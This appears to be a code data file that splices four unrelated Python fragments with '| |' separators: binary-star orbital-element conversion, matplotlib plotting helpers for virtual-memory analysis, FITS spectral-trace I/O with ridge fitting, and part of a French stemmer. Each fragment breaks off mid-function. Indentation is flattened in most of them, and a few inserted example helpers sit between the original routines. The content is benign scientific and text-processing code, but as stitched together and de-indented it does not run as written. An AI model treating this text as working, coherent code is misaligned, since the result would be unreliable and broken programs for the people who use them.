longitude_of_the_ascending_node=0 | units.deg,
argument_of_periapsis=0 | units.deg,
G=None
):
"""
    returns a two-particle Particles set, with the second particle's position
    and velocity computed from the input orbital elements.
inclination is given between 0 and 180 deg.
angles are assumed to be in deg if no unit is given.
"""
def angle_with_unit(angle, default_unit=units.deg):
try:
default_unit = angle.unit
except:
angle = angle | default_unit
return angle
# If no unit is given for angles, assume they are in degrees
true_anomaly = angle_with_unit(true_anomaly, default_unit=units.deg)
inclination = angle_with_unit(inclination, default_unit=units.deg)
argument_of_periapsis = angle_with_unit(
argument_of_periapsis,
default_unit=units.deg
)
longitude_of_the_ascending_node = angle_with_unit(
longitude_of_the_ascending_node,
default_unit=units.deg
)
primary, secondary = generate_binaries(
mass1, mass2, semimajor_axis,
eccentricity=eccentricity,
true_anomaly=true_anomaly,
inclination=inclination,
longitude_of_the_ascending_node=longitude_of_the_ascending_node,
argument_of_periapsis=argument_of_periapsis,
G=G
)
result = Particles()
result.add_particle(primary[0])
result.add_particle(secondary[0])
return result
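# Illustrative sketch (not part of the original module): this deprecated
# helper treats bare floats as degrees, so the two calls below are equivalent.
def _example_new_binary():
    binary = new_binary_from_orbital_elements(
        1.0 | units.MSun, 0.5 | units.MSun, 1.0 | units.AU,
        eccentricity=0.1, inclination=30, true_anomaly=90)
    same = new_binary_from_orbital_elements(
        1.0 | units.MSun, 0.5 | units.MSun, 1.0 | units.AU,
        eccentricity=0.1, inclination=30 | units.deg,
        true_anomaly=90 | units.deg)
    return binary, same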
def get_orbital_elements_from_binary(binary, G=None):
"""
    Function that computes orbital elements from a given two-particle set.
    Elements are computed for the second particle relative to the first;
    the return values are: mass1, mass2, semimajor axis, eccentricity,
    true anomaly, inclination, longitude of the ascending node and
    argument of pericenter. In the case of a perfectly circular orbit the
    true anomaly and argument of pericenter cannot be uniquely determined;
    conventional values are returned for those two angles in that case.
"""
primaries = Particles()
secondaries = Particles()
if len(binary) > 2:
raise Exception("expects binary or single part")
elif len(binary) == 2:
primaries.add_particle(binary[0])
secondaries.add_particle(binary[1])
else:
# FIXME: in case of one particle, what do we calculate the orbit of?
# The method below is what was default before.
primaries.add_particle(binary[0])
primaries[0].position *= 0
primaries[0].velocity *= 0
secondaries.add_particle(Particle())
secondaries[0].mass = 0 * primaries[0].mass
secondaries[0].position = binary.position
secondaries[0].velocity = binary.velocity
(
mass1, mass2, semimajor_axis, eccentricity, true_anomaly,
inclination, long_asc_node, arg_per
) = get_orbital_elements_from_binaries(primaries, secondaries, G=G)
return (
mass1[0], mass2[0], semimajor_axis[0], eccentricity[0],
true_anomaly[0], inclination[0], long_asc_node[0], arg_per[0])
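# Illustrative sketch (not part of the original module): round-tripping a
# binary through the conversions should recover the input elements.
def _example_elements_roundtrip():
    binary = new_binary_from_orbital_elements(
        1.0 | units.MSun, 1.0 | units.MJupiter, 5.2 | units.AU,
        eccentricity=0.048)
    m1, m2, a, ecc, nu, inc, lan, argp = \
        get_orbital_elements_from_binary(binary)
    return a.value_in(units.AU), ecc  # approximately 5.2 and 0.048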
def orbital_elements_from_binary(binary, G=None):
(
mass1, mass2, semimajor_axis, eccentricity, true_anomaly,
inclination, long_asc_node, arg_per
) = get_orbital_elements_from_binary(binary, G=G)
return (
mass1, mass2, semimajor_axis, eccentricity,
true_anomaly.value_in(units.deg),
inclination.value_in(units.deg),
long_asc_node.value_in(units.deg),
arg_per.value_in(units.deg))
def get_orbital_elements_from_binaries(
primaries, secondaries, G=None):
"""
Function that computes orbital elements from given primaries and
secondaries.
    Elements are computed for each secondary relative to its primary; the
    return values are arrays of: mass1, mass2, semimajor axis, eccentricity,
    true anomaly, inclination, longitude of the ascending node and argument
    of pericenter. In the case of a perfectly circular orbit the true
    anomaly and argument of pericenter cannot be uniquely determined;
    conventional values are returned for those two angles in that case.
"""
position = secondaries.position - primaries.position
velocity = secondaries.velocity - primaries.velocity
mass1 = primaries.mass
mass2 = secondaries.mass
total_mass = mass1 + mass2
semimajor_axis, eccentricity, | |
# Virtual memory analysis scripts.
# Developed 2012-2014 by <NAME>, <EMAIL>
# Copyright (c) 2012-2014 <NAME> and University of Washington
from util.pjh_utils import *
from plotting.PlotEvent import PlotEvent
import brewer2mpl
import copy
import itertools
import numpy as np
import plotting.plots_style as style
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.ticker import FuncFormatter
CP_SERIESNAME = 'checkpoints'
# special name to be used for series that contain datapoints for
# CheckpointEvents.
TOTALKEY = '_ToTaL_' # key that caller is unlikely to use...
PERMS_KEY_COLOR = {
'r-xsa' : style.brewer_red,
'r-xsf' : style.brewer_red,
'r-xpa' : style.brewer_red,
'r-xpf' : style.brewer_red,
'rwxsa' : style.brewer_purple,
'rwxsf' : style.brewer_purple,
'rwxpa' : style.brewer_purple,
'rwxpf' : style.brewer_purple,
'rw-sa' : style.brewer_green,
'rw-sf' : style.brewer_green,
'rw-pa' : style.brewer_green,
'rw-pf' : style.brewer_green,
'r--sa' : style.brewer_orange,
'r--sf' : style.brewer_orange,
'r--pa' : style.brewer_orange,
'r--pf' : style.brewer_orange,
'---pa' : style.brewer_blue,
'---pf' : style.brewer_blue,
}
#######################################################################
'''
Class for a generic plot datapoint; series used by a multiapp_plot may
use this class for their datapoints, or they can use their own opaque
items. Neither multiapp_plot nor series depends on this class.
This class is effectively a "struct".
'''
class datapoint:
tag = 'datapoint'
# Generic fields - no plot will use all of them, so there is some
# wasted memory space, but still seems like a good idea to have
# this generic class that can be used in particular ways by each
# plot.
# Maybe a better idea: have a generic datapoint interface that
# each particular plot must implement / subclass?
xval = None
yval = None
timestamp = None
count = None
appname = None
cp_name = None
component = None
def __init__(self):
return
# Use this for plot_lineplot().
class SmallDatapoint:
count = None
def __init__(self, count=None):
self.count = count
return
# Returns a plot datapoint when given a PlotEvent for a cp_event. Later
# on, other functions can distinguish checkpoint datapoints from other
# datapoints by checking if point.cp_name is non-None.
def new_cp_datapoint(plot_event):
tag = 'new_cp_datapoint'
if not plot_event.cp_event:
print_error(tag, ("plot_event's cp_event is None; will return "
"None").format())
return None
# Note: for timeseries data, use timestamp, not xval! timestamp
# is what's used for "normal" (non-checkpoint) datapoints.
point = datapoint()
point.timestamp = plot_event.cp_event.timestamp
if plot_event.cp_event.cp_name:
point.cp_name = plot_event.cp_event.cp_name
else:
point.cp_name = 'some-checkpoint'
return point
##############################################################################
# Creates a new figure and sets some common parameters:
# .pdf / .png size
# Title
# The figure contains a single Subplot / Axes; the caller can get a
# reference to it with "plt.axes()". If the caller wishes to add
# multiple subplots, it can call .add_subplot() on the figure that
# is returned. (The caller probably should also delete the first
# axes that is present in the returned figure - see plot_time_series().
# Note that when the first axes is deleted, the title will be removed
# also).
#
# Returns: a reference to the current figure. The figure number can be
# obtained with fig.number, then if other operations create other
# figures and make them current, the number can be used to get the
# desired one.
def plot_setup_onesubplot(title, heightfactor, widthfactor):
tag = 'plot_setup_onesubplot'
fig = plot_setup_subplots(1, 1, heightfactor, widthfactor)
ax = fig.get_axes()[0]
# Assign the title to the one and only subplot:
if title and len(title) > 1:
# This works to create a centered title, but it doesn't work with
# tight_layout() - it will get cropped, unlike a "standard" title.
# http://matplotlib.org/users/tight_layout_guide.html
#plt.text(0.5, 1.03, title, horizontalalignment='center',
# transform = ax.transAxes,
# **style.title_kwargs)
# This works pretty much the same as adding a new plt.text() as above,
# but the title ends up a little closer to the top of the plot -
# basically touching it. If this is a big problem, maybe the Text
# reference that's returned from ax.set_title() can be moved up
# directly? Or, it looks like the tight_layout() command takes a
# rect argument whose top could be increased manually...
ax.set_title(title, **style.title_kwargs)
return fig
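# Illustrative usage sketch (not part of the original script): create a figure
# with a single subplot, draw into it, then save and close it via the figure
# number as described in plot_setup_subplots() below.
def _example_plot_setup_onesubplot(plot_fname='example-plot.png'):
    fig = plot_setup_onesubplot('example title', 1.0, 1.0)
    ax = fig.get_axes()[0]
    ax.plot([0, 1, 2], [0, 1, 4])
    currentfig = plt.figure(fig.number)
    plt.savefig(plot_fname)
    plt.close(currentfig)
    return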
# Does NOT set the title - with multiple subplots, not sure what subplot
# axes (if any...) the title should belong to.
# Returns: the matplotlib.figure.Figure instance. The caller can get the
# list of subplot axes by calling fig.get_axes() (which always returns
# a 1d list, I think/hope), or can get a specific subplot axes by calling
# fig.add_subplot(subplotrows, subplotcols, desiredsubplotnumber) again.
# Note that this call must be made without a **kwargs argument! (see
# the add_subplot() description: http://matplotlib.org/api/figure_api.
# html#matplotlib.figure.Figure.add_subplot).
def plot_setup_subplots(subplotrows, subplotcols, heightfactor, widthfactor):
tag = 'plot_setup_subplots'
# fig is a matplotlib.figure.Figure instance. Every
# matplotlib figure has a number; the doc for plt.figure() says
# that "The figure objects holds this number in a number attribute."
# http://matplotlib.org/api/figure_api.html?highlight=figure#modu
# le-matplotlib.figure
# The caller may wish to perform the following steps on the
# returned figure:
# num = fig.number # save for later...
# ...
# currentfig = plt.figure(num) # get reference to figure!
# plt.savefig(plot_fname)
# plt.close(currentfig)
# http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.close
# Note: plt.subplots() would seem to be an easier way to setup
# a figure with a specified number of subplot rows + cols, but it
# doesn't take a figsize - ugh.
# Also note: changing the scale factor to 1.0 at this point causes
# the images (both png and pdf) to come out terrible - the "canvas"
# shrinks and everything squishes together, and I have no idea why.
scale_factor = 2.0
figsize = (8*scale_factor*widthfactor, 6*scale_factor*heightfactor)
# Default figsize is (8,6): leads to an 800x600 .png image.
fig = plt.figure(num=None, figsize=figsize, dpi=style.RASTER_DPI)
# num is the figure number, not the number of subplots.
# http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.figure
for i in range(1, subplotrows*subplotcols + 1):
fig.add_subplot(subplotrows, subplotcols, i)
# http://matplotlib.org/api/figure_api.html#matplotlib.
# figure.Figure.add_subplot
'''
(fig, ax_array) = plt.subplots(subplotrows, subplotcols)
# http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.subplots
# Note that format of ax_array differs depending on rows and cols...
'''
print_debug(tag, ("type(fig.get_axes()) is {}").format(
type(fig.get_axes())))
return fig
# Normalizes all of the series in the serieslist to each other. The
# total "width" of the horizontal / time / x-axis data is calculated
# across all of the series in the list, and then the datapoints for
# each series normalized in-place, resulting in x-coordinates that
# are all within the range [0..1]. Also, if alignright is True, then
# a final datapoint will be added all the way to the right of the
# time axis in every series.
def normalize_appserieslist(serieslist, alignright):
tag = 'normalize_appserieslist'
xmin = None
xmax = None
for S in serieslist:
appmin = S.data[0].timestamp
appmax = S.data[-1].timestamp
if not xmin or appmin < xmin:
xmin = appmin
if not xmax or appmax > xmax:
xmax = appmax
width = xmax - xmin
for S in serieslist:
# To normalize each series, first subtract the minimum xval from
# every point so that they all start at time 0, then divide the
# point by the "width" of the execution time to get the "percent"
# time, as a normalized value between 0 and 1.
for i in range(len(S.data)):
point = S.data[i]
if width != 0:
normalized = (point.timestamp - xmin) / width
else:
# If we have just one datapoint, put it in the middle
# of the range...
normalized = 0.5
point.timestamp = normalized
if alignright:
if S.data[-1].timestamp < 1.0:
lastpoint = copy.deepcopy(S.data[-1])
lastpoint.timestamp = 1.0
S.data.append(lastpoint)
return
def percent0_formatter_func(n, pos=0):
# This works to still use an integer percent label when log-scale is
# enabled.
return "{}%".format(int(round(n*100)))
#return ("{0:.0f}%".format(n*100))
def percent1_formatter_func(n, pos=0):
# Percentages: multiply by 100, *then* round to 1 decimal.
return ("{:.1f}%".format(n*100))
def percent2_formatter_func(n, pos=0):
# Percentages: multiply by 100, *then* round to 2 decimals.
return ("{:.2f}%".format(n*100))
def log_to_standard_formatter_func(n, pos=0):
# Show scale as 10, 100, 1000, etc., rather than 10^1, 10^2, etc.
return "{}".format(int(n))
def billions_formatter_func(n, pos=0):
divideby = 1000000000
return ("{}".format(int(n/divideby)))
# Input:
# A dict that maps series names to:
# A list of datapoint objects, whose "timestamp" and "count" fields
# are set! (the timestamp values in the list must be sorted?)
# Title / labels
# ysplits: y-axis values to split plot apart at. For example, a
# ysplits list of [100, 1000] will cause this method to split the
# series into three timeseries plots: one for series whose maximum
# value is <= 100, one for series whose maximum value is between
# 101 and 1000, and one for series whose maximum value is greater
# than 1000.
# yax_units: display y-axis values as percentages rather than decimal.
# cp_series: a series object containing datapoints for CheckpointEvents.
# Returns: a matplotlib.figure.Figure instance, or None if a figure
# could not be generated.
def plot_time_series(plotdict, title, x_axislabel, y_axislabel,
ysplits, logscale=False, yax_units=None, cp_series=None,
more_ytick_space=False):
tag = 'plot_time_series'
return plot_scatter_lineplot(plotdict, title, x_axislabel, y_axislabel,
ysplits, logscale=logscale, yax_units=yax_units,
cp_series=cp_series, is_timeseries=True, stepped=True,
more_ytick_space=more_ytick_space)
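# Illustrative usage sketch (not part of the original script): plotdict maps a
# series name to a list of datapoint objects with 'timestamp' and 'count' set;
# an empty ysplits list is assumed here to keep all series on a single plot.
def _example_plot_time_series():
    points = []
    for t, c in enumerate([1, 5, 3]):
        p = datapoint()
        p.timestamp = float(t)
        p.count = c
        points.append(p)
    return plot_time_series({'example-series': points}, 'example title',
                            'time', 'count', ysplits=[])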
# Simple lineplot, where each series in the plotdict has exactly
# one point per xlabel. The points in the lists held in the plotdict
# values must be datapoint or SmallDatapoint objects.
# Returns: a matplotlib.figure.Figure instance, or None if a figure
# could not be generated.
def plot_lineplot(plotdict, title, x_axislabel, y_axislabel, xlabels,
ysplits, logscale=False, yax_units=None,
#show_markers=True,
hlines=None, vertical_xlabels=False):
tag = 'plot_lineplot'
if True: # I think we always expect this:
for (seriesname, pointlist) in list(plotdict.items()):
if len(pointlist) != len(xlabels):
print_unexpected(True, tag, | |
get_trace_list(self):
"""Return raw trace fit parameters."""
return self._trace_list
# Return full primary data header:
def get_metadata(self):
return self._metadata
# Return traces as pixel masks (requires appropriate metadata):
def get_trace_masks(self, vlevel=0):
"""Returns traces as pixel masks."""
if not self._imshape:
sys.stderr.write("Image dimensions not available!\n")
#return None
            raise RuntimeError("Image dimensions not available!")
return self._mask_from_traces(self._imshape, self._trace_list, vlevel)
# Evaluate ridge corresponding to specified trace:
def _ridge_from_trace(self, tr_model):
"""Evaluate X,Y ridge from input trace model."""
xvals = np.arange(tr_model['xmin'], tr_model['xmax']).astype('uint16')
yvals = ridge_eval(tr_model['params'], xvals)
return (xvals, yvals)
# Build pixel masks corresponding to listed traces:
def _mask_from_traces(self, imshape, trace_list, vlevel=0):
mask_image = np.zeros(imshape, dtype='bool')
trace_coords = []
n_traces = len(trace_list)
for i,trace_fit in enumerate(trace_list, 1):
if (vlevel >= 1):
sys.stderr.write("\rAdding trace %d of %d ... " % (i, n_traces))
#xlist = np.arange(trace_fit['xmin'],
# trace_fit['xmax']).astype('uint16')
#ordfit_ycoord = ridge_eval(trace_fit['params'], xlist)
xlist, ordfit_ycoord = self._ridge_from_trace(trace_fit)
ylower = np.int_(np.floor(ordfit_ycoord))
yc_list, xc_list = [], []
apron_pix = trace_fit['apron']
for offset in range(-apron_pix + 1, apron_pix + 1):
xc_list.append(xlist)
yc_list.append(ylower + offset)
pass
trace_coords.append((np.vstack(yc_list), np.vstack(xc_list)))
return trace_coords
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
## In this (initial) format, each trace will be given its own HDU. That HDU has
## a single 'params' column with the polynomial fit coefficients. Each HDU also
## has a few keywords providing useful metadata.
## Metadata keyword/comment mapping ():
_trace_hkey_spec = [
( 'xmin', 'XMIN', '[pixel] trace lower X limit (left side)'),
( 'xmax', 'XMAX', '[pixel] trace upper X limit (right side)'),
('apron', 'APRON', '[pixel] apron size used for tracing'),
( 'fnum', 'FIBERNUM', 'NRES fiber/channel number (0/1/2)'),
('impos', 'FIBIMPOS', 'NRES fiber/channel position (top/mid/bot)'),
]
_metadata_order = ['EXTRVERS', 'TR_IMAGE', 'SRC_XPIX', 'SRC_YPIX',
'TRMETHOD', 'TRB_XMID', 'TRB_HALF', 'BAFFMASK', 'YPROFILE', ]
class TraceIO(object):
def __init__(self):
self._divcmt = pf.Card("COMMENT", 65*'-')
return
def _header_from_dict(self, fit_data):
c_list = [self._divcmt]
for dkey,fkey,cmnt in _trace_hkey_spec:
if dkey in fit_data.keys():
c_list.append(pf.Card(fkey, fit_data[dkey], comment=cmnt))
c_list.append(self._divcmt)
return pf.Header(c_list)
def _trace_to_HDU(self, fit_data):
header = self._header_from_dict(fit_data)
pcolumn = pf.Column(name="params", format='D', unit=None,
array=fit_data['params'])
return pf.BinTableHDU.from_columns([pcolumn,], header=header)
def _trace_from_HDU(self, trace_HDU):
fit_data = {'params':trace_HDU.data['params']}
for dkey,fkey,cmnt in _trace_hkey_spec:
if fkey in trace_HDU.header.keys():
fit_data[dkey] = trace_HDU.header[fkey]
return fit_data
# Make primary header from list of tuples:
    def _prihdr_from_dict(self, hdata=None):
prihdr = pf.Header()
prihdr.append(self._divcmt)
prihdr['TRIOVERS'] = (__version__, 'TraceIO code version')
if hdata:
# Standard keys go in first:
for kk in _metadata_order:
if kk in hdata.keys():
prihdr[kk] = tuple(hdata.pop(kk))
prihdr.append(self._divcmt)
# Dump in anything else:
if len(hdata):
prihdr.update({k:tuple(v) for k,v in hdata.items()})
                prihdr.append(self._divcmt)
        return prihdr
# Save a list of traces to a FITS table:
def store_traces(self, filename, traces_list, hdata=None):
if isinstance(hdata, pf.Header):
prihdr = hdata.copy(strip=True)
else:
prihdr = self._prihdr_from_dict(hdata)
prihdr['TRIOVERS'] = (__version__, 'TraceIO code version')
prihdu = pf.PrimaryHDU(header=prihdr)
tables = [prihdu]
for trace in traces_list:
tables.append(self._trace_to_HDU(trace))
hdu_list = pf.HDUList(tables)
hdu_list.writeto(filename, overwrite=True)
return
# Store from existing TraceData object (e.g., after update):
def store_TraceData(self, filename, tdobj):
tdata = tdobj.get_trace_list()
mdata = tdobj.get_metadata()
return self.store_traces(filename, tdata, hdata=mdata)
# Load traces from the specified file:
def load_traces(self, filename):
traces_list = []
with pf.open(filename) as hdu_list:
all_pri_keys = hdu_list[0].header
use_pri_keys = all_pri_keys.copy(strip=True)
for hdu in hdu_list[1:]:
traces_list.append(self._trace_from_HDU(hdu))
return TraceData(traces_list, use_pri_keys)
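## Illustrative usage sketch (not part of the original module): store a list
## of trace-fit dictionaries to a FITS table and read them back as a TraceData
## object (filename and trace fits are assumed to be supplied by the caller).
def _example_traceio_roundtrip(filename, traces_list, primary_header=None):
    tio = TraceIO()
    tio.store_traces(filename, traces_list, hdata=primary_header)
    tdata = tio.load_traces(filename)
    return tdata.get_trace_list(), tdata.get_metadata()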
##--------------------------------------------------------------------------##
## overplotting of traces onto image ##
##--------------------------------------------------------------------------##
## Trimmer for 'drawing' ridges:
#def trim_to_image_dims(xcoo, ycoo, imshape):
def trim_to_image_dims(xcoo, ycoo, image):
ny, nx = image.shape
useful = (0 <= xcoo) & (xcoo < nx) & (0 <= ycoo) & (ycoo < ny)
return (ycoo[useful], xcoo[useful])
def overplot_traces(idata, trace_list, vlevel=0):
n_traces = len(trace_list)
tmp_image = np.copy(idata)
for i,trace_fit in enumerate(trace_list, 1):
if (vlevel >= 0):
sys.stderr.write("\rPainting trace %d of %d ... " % (i, n_traces))
#ordfit_params = nrex.fit_polynomial(xlist, ylist, fit_degree)['params']
xlist = np.arange(trace_fit['xmin'], trace_fit['xmax']).astype('uint16')
ordfit_ycoord = ridge_eval(trace_fit['params'], xlist)
ylower = np.int_(np.floor(ordfit_ycoord))
#ylower_safe = trim_to_image_dims(xlist, ylower + 0, tmp_image)
#yupper_safe = trim_to_image_dims(xlist, ylower + 1, tmp_image)
tmp_image[trim_to_image_dims(xlist, ylower + 0, tmp_image)] = np.nan
tmp_image[trim_to_image_dims(xlist, ylower + 1, tmp_image)] = np.nan
sys.stderr.write("done.\n")
return tmp_image
#def get_trace_xya(trace_fit):
# """
# Return X position, ridge Y position, and pixel apron from the specified
# trace parameter dictionary.
#
# NOTE: positions are in array coordinates (0-indexed)
# """
# ridge_x = np.arange(trace_fit['xmin'], trace_fit['xmax']).astype('uint16')
# ridge_y = ridge_eval(trace_fit['params'], ridge_x)
# return (ridge_x, ridge_y, trace_fit['apron'])
#def mask_from_traces(imshape, trace_list, vlevel=0):
# mask_image = np.zeros(imshape, dtype='bool')
# trace_coords = []
# n_traces = len(trace_list)
# for i,trace_fit in enumerate(trace_list, 1):
# if (vlevel >= 1):
# sys.stderr.write("\rAdding trace %d of %d ... " % (i, n_traces))
# xlist = np.arange(trace_fit['xmin'], trace_fit['xmax']).astype('uint16')
# ordfit_ycoord = ridge_eval(trace_fit['params'], xlist)
# ylower = np.int_(np.floor(ordfit_ycoord))
# yc_list, xc_list = [], []
# apron_pix = trace_fit['apron']
# for offset in range(-apron_pix + 1, apron_pix + 1):
# xc_list.append(xlist)
# yc_list.append(ylower + offset)
# pass
# trace_coords.append((np.vstack(yc_list), np.vstack(xc_list)))
# return trace_coords
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
## Ridge fitting and evaluation:
def fit_polynomial(xvec, yvec, poly=2, rlm=True):
results = {'xmin':xvec.min(), 'xmax':xvec.max()}
design_matrix = np.column_stack([xvec**i for i in range(poly + 1)])
if rlm:
best_fit = sm.RLM(yvec, design_matrix).fit()
else:
best_fit = sm.OLS(yvec, design_matrix).fit()
results['params'] = best_fit.params
results['fitting'] = best_fit
return results
def theil_sen_fit(xvec, yvec, poly=1, rlm=False):
results = {'xmin':xvec.min(), 'xmax':xvec.max()}
results['params'] = ts.linefit(xvec, yvec, weighted=False, joint=True)
results['fitting'] = None
return results
def fit_yridge(spectrum_order, poly=2, rlm=True):
xcoo, ycoo, flux = spectrum_order
return fit_polynomial(xcoo, ycoo, poly=poly, rlm=rlm)
## Evaluate a polynomial ridge fit:
def ridge_eval(model, xpos):
return np.sum([cc*np.float_(xpos)**i for i,cc in enumerate(model)], axis=0)
## Return ridge x,y array coordinates:
def ridge_pos_2d(rspec):
xcoords = np.arange(rspec['xmin'], rspec['xmax'] + 1, dtype='float32')
ycoords = ridge_eval(rspec['params'], xcoords)
return xcoords, ycoords
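## Illustrative sketch (not part of the original module): a ridge model is a
## dict holding 'xmin'/'xmax' plus ascending polynomial coefficients under
## 'params'; fit_polynomial() produces one (assuming the statsmodels import
## used above is available) and ridge_pos_2d() evaluates it.
def _example_ridge_fit_and_eval():
    xvec = np.arange(500, dtype='float32')
    yvec = 50.0 + 0.02*xvec + 1.0e-5*xvec**2
    model = fit_polynomial(xvec, yvec, poly=2, rlm=False)
    return ridge_pos_2d(model)  # (x coords, fitted y coords)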
## Fit polynomials to all orders in a spectrum:
def fit_spectrum_ridges_fluxes(spectrum_orders, ypoly=2, fpoly=2, vlevel=0):
ridges = []
fluxes = []
n_orders = len(spectrum_orders)
for i, (xcoo, ycoo, flux) in enumerate(spectrum_orders):
if vlevel >= 1:
sys.stderr.write("\rFitting order %d of %d ... " % (i+1, n_orders))
ridges.append(fit_polynomial(xcoo, ycoo, poly=ypoly))
fluxes.append(fit_polynomial(xcoo, flux, poly=fpoly))
if vlevel >= 1:
sys.stderr.write("done.\n")
return (ridges, fluxes)
## Evaluate all orders:
def splat_orders_onto_image(image, ridge_list, fluxes_list, dtype='float32'):
orderpos = np.zeros_like(image, dtype=dtype)
for rr,ff in zip(ridge_list, fluxes_list):
xvalues, yvalues = ridge_pos_2d(rr)
xvalues, fvalues = ridge_pos_2d(ff)
xcoords = np.int_(xvalues)
y_upper = np.int_(np.ceil(yvalues))
y_lower = np.int_(np.floor(yvalues))
orderpos[y_upper+1, xcoords] = fvalues
orderpos[y_upper+0, xcoords] = fvalues
orderpos[y_lower-0, xcoords] = fvalues
orderpos[y_lower-1, xcoords] = fvalues
return orderpos
##--------------------------------------------------------------------------##
## Ridge object for tracing echelle orders:
class Ridge(object):
def __init__(self, image, bmask=None):
"""
Initialize ridge detector. Inputs:
image -- 2D image with spectrum to trace
bounds -- [optional] where to stop extracting (e.g., baffle mask)
"""
self.idata = image
self.bmask = bmask
pass
# ---------------------------------------------
# Follow-the-ridge driver routine:
def extract(self, yapprox, xcolumns, apron, nshift=40,
mincounts=None, maxdepth=0, vlevel=0):
"""
Main extraction driver routine. Spreads outwards from initial
guess, following flux 'ridge' until the signal is lost or an edge
is reached. Returns X,Y (0-indexed) coordinates of identified ridge.
yapprox -- approximate Y-coord of ridge (array coords)
xcolumns -- slice with column range for initial guess/fit
apron -- half-size of re-centroiding box (pixels)
maxdepth -- [debugging] limit the number of extension iterations
vlevel -- verbosity control
"""
# MAXDEPTH warning:
if maxdepth > 0:
sys.stderr.write("WARNING: maxdepth in use: %d\n" % maxdepth)
# Get data, perform initial linear fit:
ysection = self._make_yslice(yapprox, apron)
r1x, r1y = self._guess_ridge_from_slices(self.idata, xcolumns, ysection)
#initial_fit = nrex.fit_polynomial(r1x, r1y, poly=1)
initial_fit = fit_polynomial(r1x, r1y, poly=1)
#sys.stderr.write("r1x: %s\n" % str(r1x))
#sys.stderr.write("r1y: %s\n" % str(r1y))
#sys.stderr.write("initial_fit: %s\n" % str(initial_fit))
## DEBUGGING: evaluate initial_fit for inspection:
#sys.stderr.write("-------------------------------------------\n")
#dbg_fitted_y = ridge_eval(initial_fit['params'], r1x)
#sys.stderr.write("initial_fit_debug:\n")
#sys.stderr.write("%s\n" % str(np.vstack((r1x, dbg_fitted_y)).T))
#sys.stderr.write("-------------------------------------------\n")
# Refine ridge position using symmetric apron, refit:
r2x, r2y, r2counts = self._recenter_ridge_ixmodel(self.idata,
r1x, initial_fit['params'], apron)
#starter_fit = nrex.fit_polynomial(r2x, r2y, poly=1)
starter_fit = fit_polynomial(r2x, r2y, poly=1)
#sys.stderr.write("starter_fit: %s\n" % str(starter_fit))
#sys.stderr.write("r2x: %s\n" % str(r2x))
#sys.stderr.write("r2y: %s\n" % str(r2y))
##asdf = raw_input()
## DEBUGGING: evaluate starter_fit for inspection:
#sys.stderr.write("-------------------------------------------\n")
#dbg_fitted_y = ridge_eval(starter_fit['params'], r1x)
#sys.stderr.write("starter_fit_debug:\n")
#sys.stderr.write("%s\n" % str(np.vstack((r1x, dbg_fitted_y)).T))
#sys.stderr.write("-------------------------------------------\n")
##return (r2x, dbg_fitted_y)
# Extend initial fit in both directions:
extkw = {'apron':apron, 'mincounts':mincounts,
'maxdepth':maxdepth, 'vlevel':vlevel}
rsegs = self._extend_ridge_to_edge(self.idata, starter_fit,
nudgepix=nshift, **extkw)
lsegs = self._extend_ridge_to_edge(self.idata, starter_fit,
nudgepix=-nshift, **extkw)
# Combine segments:
segments = [(r2x, r2y)]
segments.extend(rsegs)
segments.extend(lsegs)
# Separate coordinates, return sorted results:
xlist, ylist = zip(*segments)
xlist, ylist = np.hstack(xlist), np.hstack(ylist)
order = np.argsort(xlist)
return xlist[order], ylist[order]
# ---------------------------------------------
@staticmethod
def _make_yslice(ycenter, apron):
"""Make slice centered | |
not self.slice_from(u"eux"):
return False
except lab14: pass
elif among_var == 12:
# (, line 150
# call R1, line 150
if not self.r_R1():
return False
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
# delete, line 150
if not self.slice_del():
return False
elif among_var == 13:
# (, line 155
# call RV, line 155
if not self.r_RV():
return False
# fail, line 155
# (, line 155
# <-, line 155
if not self.slice_from(u"ant"):
return False
return False
elif among_var == 14:
# (, line 156
# call RV, line 156
if not self.r_RV():
return False
# fail, line 156
# (, line 156
# <-, line 156
if not self.slice_from(u"ent"):
return False
return False
elif among_var == 15:
# (, line 158
# test, line 158
v_11 = self.limit - self.cursor
# (, line 158
if not self.in_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
# call RV, line 158
if not self.r_RV():
return False
self.cursor = self.limit - v_11
# fail, line 158
# (, line 158
# delete, line 158
if not self.slice_del():
return False
return False
return True
def r_i_verb_suffix(self):
# setlimit, line 163
v_1 = self.limit - self.cursor
# tomark, line 163
if self.cursor < self.I_pV:
return False
self.cursor = self.I_pV
v_2 = self.limit_backward
self.limit_backward = self.cursor
self.cursor = self.limit - v_1
# (, line 163
# [, line 164
self.ket = self.cursor
# substring, line 164
among_var = self.find_among_b(FrenchStemmer.a_5, 35)
if among_var == 0:
self.limit_backward = v_2
return False
# ], line 164
self.bra = self.cursor
if among_var == 0:
self.limit_backward = v_2
return False
elif among_var == 1:
# (, line 170
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
self.limit_backward = v_2
return False
# delete, line 170
if not self.slice_del():
return False
self.limit_backward = v_2
return True
def r_verb_suffix(self):
# setlimit, line 174
v_1 = self.limit - self.cursor
# tomark, line 174
if self.cursor < self.I_pV:
return False
self.cursor = self.I_pV
v_2 = self.limit_backward
self.limit_backward = self.cursor
self.cursor = self.limit - v_1
# (, line 174
# [, line 175
self.ket = self.cursor
# substring, line 175
among_var = self.find_among_b(FrenchStemmer.a_6, 38)
if among_var == 0:
self.limit_backward = v_2
return False
# ], line 175
self.bra = self.cursor
if among_var == 0:
self.limit_backward = v_2
return False
elif among_var == 1:
# (, line 177
# call R2, line 177
if not self.r_R2():
self.limit_backward = v_2
return False
# delete, line 177
if not self.slice_del():
return False
elif among_var == 2:
# (, line 185
# delete, line 185
if not self.slice_del():
return False
elif among_var == 3:
# (, line 190
# delete, line 190
if not self.slice_del():
return False
# try, line 191
v_3 = self.limit - self.cursor
try:
# (, line 191
# [, line 191
self.ket = self.cursor
# literal, line 191
if not self.eq_s_b(1, u"e"):
self.cursor = self.limit - v_3
raise lab0()
# ], line 191
self.bra = self.cursor
# delete, line 191
if not self.slice_del():
return False
except lab0: pass
self.limit_backward = v_2
return True
def r_residual_suffix(self):
# (, line 198
# try, line 199
